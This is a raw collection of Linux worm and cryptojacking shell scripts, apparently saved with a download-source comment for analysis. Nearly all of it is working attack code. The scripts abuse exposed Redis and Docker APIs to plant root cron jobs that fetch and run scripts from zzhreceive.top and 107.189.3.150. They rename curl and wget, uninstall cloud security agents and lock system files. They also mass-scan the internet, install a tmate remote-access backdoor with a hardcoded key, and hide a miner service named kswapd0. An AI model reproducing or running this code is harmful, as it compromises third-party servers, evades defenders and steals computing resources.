echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/etc/cron.d/"' >> .dat
echo 'config set dbfilename "zzh"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/etc/"' >> .dat
echo 'config set dbfilename "crontab"' >> .dat
echo 'save' >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
while true; do
for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw &
done < .r.$x.$y.l
done
done
done
sleep 1
masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo "root runing....."
fi
cronis_sh
##### 下载来源:h*t*t*p://107.189.3.150/b2f628/cronis.sh #####
#!/bin/bash
rtdir="/etc/svcupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ice-unix/... && chmod -R 777 .ice-unix && cd .ice-unix/...
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get update -y --exclude=procps* psmisc*
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make
apt-get install -y gcc
apt-get install -y git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
#apt-get install -y wget curl
apt-get install -y unhide
fi
if [ -x "$(command -v yum)" ]; then
yum update -y --exclude=procps* psmisc*
yum install -y epel-release
yum update -y --exclude=procps* psmisc*
yum install -y git
yum install -y iptables
yum install -y make
yum install -y gcc
yum install -y redis
yum install -y libpcap
yum install -y libpcap-devel
#yum install -y wget curl
yum install -y unhide
fi
sleep 1
echo "Software Installed"
dddir="/usr/sbin/unhide"
$dddir quick |grep PID:|awk '{print $4}'|xargs -I % kill -9 % 2>/dev/null
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
downloads()
{
if [ -f "/usr/bin/curl" ]
then
echo $1,$2
http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
else
curl --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/cd1" ]
then
http_code = `cd1 -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
else
cd1 --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/wget" ]
then
wget --timeout=10 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=10 --tries=100 -O $2 $3
fi
elif [ -f "/usr/bin/wd1" ]
then
wd1 --timeout=10 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wd1 --timeout=10 --tries=100 -O $2 $3
fi
fi
}
if ps aux | grep -i '[a]liyun'; then
downloads http://update.aegis.aliyun.com/download/uninstall.sh | bash
downloads http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"
if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
$bbdira -sL -o x1.tar.gz http://oracle.zzhreceive.top/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
echo "Masscan Installed"
fi
echo "Masscan Already Installed"
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
$bbdira -sL -o .x112 http://oracle.zzhreceive.top/b2f628/p.tar || $ccdira -q -O .x112 http://oracle.zzhreceive.top/b2f628/p.tar
sleep 1
[ -f .x112 ] && tar xf .x112&& cd pnscan && ./configure && make && make install && cd .. && rm -rf pnscan .x112
echo "Pnscan Installed"
fi
echo "Pnscan Already Installed"
systemctl status docker
ps -ef|grep 2375|grep -v grep
if [ $? -ne 0 ]
then
echo "docker not start"
else
for config in $(systemctl status docker|grep docker.service|grep -i load|awk -F "(" '{print $2}'|awk -F ';' '{print $1}'); do sed -i 's/2375/2275/g' $config && systemctl daemon-reload && systemctl restart docker; done
fi
$bbdir -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash
$bbdira -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash
scan
# /usr/shared/[scan]
#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
function SecureTheSystem(){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsof wget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=`which $SYSFILE` 2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
done
}
sleep 1
if [ -f "/bin/ps.original" ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'config set stop-writes-on-bgsave-error no' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/etc/cron.d/"' >> .dat
echo 'config set dbfilename "zzh"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/etc/"' >> .dat
echo 'config set dbfilename "crontab"' >> .dat
echo 'save' >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
while true; do
for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw &
done < .r.$x.$y.l
done
done
done
sleep 1
masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo "root runing....."
fi
mate
# /usr/shared/[mate]
#!/bin/bash
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://bbq.zzhreceive.top/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
if [ -f "/var/tmp/.rundom" ]
then
URLTOKEN=$(cat /var/tmp/.rundom)
else
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
echo $URLTOKEN >/var/tmp/.rundom
fi
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
/tmp/tmate -F -k tmk-Ta5vTFHKJWn1dhlYVnWoBYmJ8c -n $URLTOKEN >/tmp/.tmbd
[mass]
# /usr/shared/[mass]
#!/bin/bash
if [ -f /bin/cd1 ];then
aabb=/bin/cd1
echo "cd1 exist"
elif [ -f /bin/curl ];then
aabb=/bin/curl
echo "curl exist"
else
echo "curl not exist,use yum reinstall"
yum -y remove curl&&yum -y install curl
fi
if [ -f /bin/wd1 ];then
ccdd=/bin/wd1
echo "wd1 exist"
elif [ -f /bin/wget ];then
ccdd=/bin/wget
echo "wget exist"
else
echo "wget not exist,use yum reinstall"
yum -y remove wget&&yum -y install wget
fi
RATE_TO_SCAN=$(cat /proc/meminfo |grep MemTotal|awk '{print $2/1024/1024}'|awk -F "." '{print $1}')
if (("$RATE_TO_SCAN"<=2 )); then
RATE_TO_SCAN=1000
elif (("$RATE_TO_SCAN"<=4)); then
RATE_TO_SCAN=2000
elif (("$RATE_TO_SCAN"<=8)); then
RATE_TO_SCAN=5000
elif (("$RATE_TO_SCAN"<=16)); then
RATE_TO_SCAN=20000
elif (("$RATE_TO_SCAN"<=32)); then
RATE_TO_SCAN=20000
elif (("$RATE_TO_SCAN"<=64)); then
RATE_TO_SCAN=20000
elif (("$RATE_TO_SCAN">64)); then
RATE_TO_SCAN=20000
else
echo other
fi
if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then $ccdd http://bbq.zzhreceive.top/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type jq 2>/dev/null 1>/dev/null; then $ccdd http://bbq.zzhreceive.top/jq -O /usr/bin/jq && chmod +x /usr/bin/jq ; fi
if ! type docker 2>/dev/null; then $aabb -sLk https://get.docker.com | bash ; fi
if ! type masscan 2>/dev/null 1>/dev/null; then yum -y install epel-release && yum clean all && yum -y install masscan ; fi
clear ; echo "" ; echo ""
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6
version=$(cat /etc/redhat-release |awk '{print $4}'|awk -F "." '{print $1}')
if ( "$version" -eq 7 ); then
echo "system release centos 7"
else
echo "system release centos 8" && ln -s /usr/lib64/libpcap.so.1 /usr/lib64/libpcap.so
fi
chmod +x /usr/bin/zgrab
dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";
for ipaddy in ${!rndstr}
do
TARGET=$ipaddy:$port
echo '##################################################'
$aabb -sLk http://107.189.3.150/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run --rm -v /:/mnt alpine chroot /mnt/ /bin/sh -c "if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y --reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/crontab && echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/cron.d/zzh"
done
}
while true; do
#for RANGE in $( echo -e "47\n39\n8\n121\n106\n120\n123\n101\n139\n81\n44\n119\n100\n42\n49\n118\n1\n114\n112\n115\n111\n116\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113" | sort -R ); do
for RANGE in $( seq 0 225 | sort -R ); do
dAPIpwn $RANGE".0.0.0/8" 2375 $RATE_TO_SCAN
dAPIpwn $RANGE".0.0.0/8" 2376 $RATE_TO_SCAN
done
done
mate
# /usr/shared/[mate]
#!/bin/bash
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://bbq.zzhreceive.top/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
if [ -f "/var/tmp/.rundom" ]
then
URLTOKEN=$(cat /var/tmp/.rundom)
else
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
echo $URLTOKEN >/var/tmp/.rundom
fi
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
/tmp/tmate -F -k tmk-Ta5vTFHKJWn1dhlYVnWoBYmJ8c -n $URLTOKEN >/tmp/.tmbd
kswapd0_service
# abc
# /etc/systemd/system/kswapd0.service
[Unit]
Description=kswapd0 system service
[Service]
ExecStart=/var/tmp/.copydie/[kswapd0] --config=/var/tmp/.copydie/[kswapd0].pid
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
